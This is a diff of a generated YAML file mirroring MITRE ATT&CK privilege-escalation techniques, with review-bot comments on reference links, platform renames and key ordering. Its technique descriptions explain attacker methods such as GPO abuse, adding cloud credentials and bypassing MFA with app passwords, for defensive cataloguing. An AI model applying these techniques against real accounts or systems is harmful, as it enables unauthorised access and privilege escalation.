+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
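Review bot: the T1574.008 reference list now mixes two URL conventions: `Microsoft CreateProcess` and `Microsoft WinExec` move to learn.microsoft.com with September 12, 2024 retrieval dates, while `Windows NT Command Shell` and `Microsoft Environment Property` keep docs.microsoft.com `previous-versions` links with `?redirectedfrom=MSDN` and their 2014/2016 retrieval dates. If the refresh is driven by the upstream bundle this is expected and should be left alone; if it was done by hand, refresh all four together so the retrieval dates stay meaningful. The reorder of the references and the added `revoked: false` are otherwise fine.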
@@ -21909,6 +22236,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -21920,16 +22251,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -21965,12 +22292,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
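Review bot: the two harmj0y references are moved from plain `http` URLs on the old host to `https` on blog.harmj0y.net with a 2024 retrieval date, which is good, but the `TechNet Group Policy Basics` entry immediately below keeps the same "Retrieved March 5" date the replaced entries had and still points at blogs.technet.microsoft.com. If the link refresh is a manual pass rather than an upstream change, this entry should be checked and re-dated in the same hunk.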
@@ -21978,14 +22305,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -22000,6 +22326,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -22008,18 +22335,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
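Review bot: the platform list for T1078.001 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, with the version bumped to 1.4; this is a breaking change for anything in the repo that keys on the old platform strings (per-platform index files, test filters, platform lookups in the generators). An index generated for a retired platform name would silently end up empty, so confirm the index generators and any platform-name maps are updated in the same change. The same rename is applied to T1548, T1548.005 and T1098.005 further down and the check applies to all of them.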
@@ -22051,9 +22378,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -22125,7 +22449,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -22152,7 +22475,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -22178,8 +22501,6 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
@@ -22270,7 +22591,7 @@ privilege-escalation:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -22391,7 +22712,6 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -22471,7 +22791,7 @@ privilege-escalation:
name: bash
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -22503,11 +22823,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -22548,11 +22867,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -22608,12 +22926,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -22670,7 +22987,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -22955,7 +23271,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -23065,7 +23380,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -23138,7 +23452,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -23171,13 +23485,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -23239,10 +23551,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -23300,7 +23611,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -23342,7 +23652,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -23401,8 +23711,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -23432,7 +23740,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
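Review bot: not introduced by this patch, but visible in the context of the T1574.005 hunk: the Stefan Kanthak reference is dated "(2015, December 8)" and "Retrieved December 4, 2014", so the retrieval precedes publication by a year. Since the generator mirrors upstream, this should be reported upstream rather than fixed here, but it is worth a note so the regenerated file is not assumed to be clean.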
@@ -23467,12 +23775,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -23549,7 +23855,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -23588,7 +23893,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -23637,8 +23942,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -23670,7 +23973,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -23718,13 +24021,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -23737,16 +24038,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
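Review bot: the "Azure AD" to "Entra ID" rename in the T1098.005 description is applied consistently within the hunk, and the citation keys (`AADInternals - Device Registration`, `AADInternals - Conditional Access Bypass`, `AADInternals - BPRT`) are rightly left untouched because they index into `external_references`. One cosmetic point: the re-wrapped line `Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may` carries over the stray space before `\n\n` from the old text; harmless in the rendered description, but if the generator normalizes whitespace anyway it could drop it.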
@@ -23758,16 +24059,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
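Review bot: unlike the other platform updates in this diff, which replace retired names one-for-one, this hunk removes `SaaS` from T1098.005 without a replacement, leaving only `Windows` and `Identity Provider`. That narrows the technique's platform scope, so confirm it matches the upstream object rather than being a side effect of a rename mapping; a mapping that collapsed `SaaS` into `Identity Provider` would produce exactly this diff. The version bump from 1.2 to 1.3 together with the added contributor (Arun Seelagan, CISA) is consistent with a genuine upstream content change, which supports the former reading.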
@@ -23822,7 +24123,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -23845,7 +24145,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -23889,8 +24189,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -23967,7 +24265,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -23995,8 +24293,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -24055,23 +24351,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
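Review bot: the only content change in the T1098.001 description lines is "Azure AD" becoming "Azure / Entra ID", but the dumper rewraps six lines around it because the folded double-quoted scalar is re-flowed at a fixed width. Emitting descriptions as literal blocks (or with an unlimited line width) would keep future diffs to the words that actually changed; the same rewrap noise appears in the two description hunks that follow.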
@@ -24081,11 +24376,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
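Review bot: the new CreateLoginProfile sentence introduces two citation keys, `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`, so they must resolve to `source_name` entries under `external_references`; both are added in the references hunk for this object further down, which is good, but that pairing is worth checking whenever a description and its references land in separate hunks.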
@@ -24096,12 +24395,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
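Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted after `kill_chain_phases` here, while the same key with the same value is deleted at the bottom of this object a few hunks below, together with `x_mitre_modified_by_ref`, which is likewise re-added after `x_mitre_is_subtechnique`. The net change for those two keys is ordering only; a fixed key order in the generator would remove that churn and leave the real change, the dropped `spec_version`, visible. The added app-password paragraph cites `Mandiant APT42 Operations 2024` and `Microsoft Entra ID App Passwords`, both of which are added in the references hunk for this object.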
@@ -24110,6 +24416,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -24118,13 +24425,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
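Review bot: the platform list for T1098.001 drops `Azure AD` and adds `Identity Provider` (version 2.7 to 2.8). If any per-platform index is produced from `x_mitre_platforms`, an index keyed on the old name loses this technique and one keyed on the new name needs to exist, so those outputs should be regenerated in the same change. Also note the two data sources added here are `Active Directory: Active Directory Object Creation` and `Active Directory: Active Directory Object Modification` although the platforms are IaaS, SaaS and Identity Provider; that is how the upstream object reads, but it is worth a sentence in the PR description so nobody treats it as a generator bug.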
@@ -24150,10 +24460,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -24162,10 +24480,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
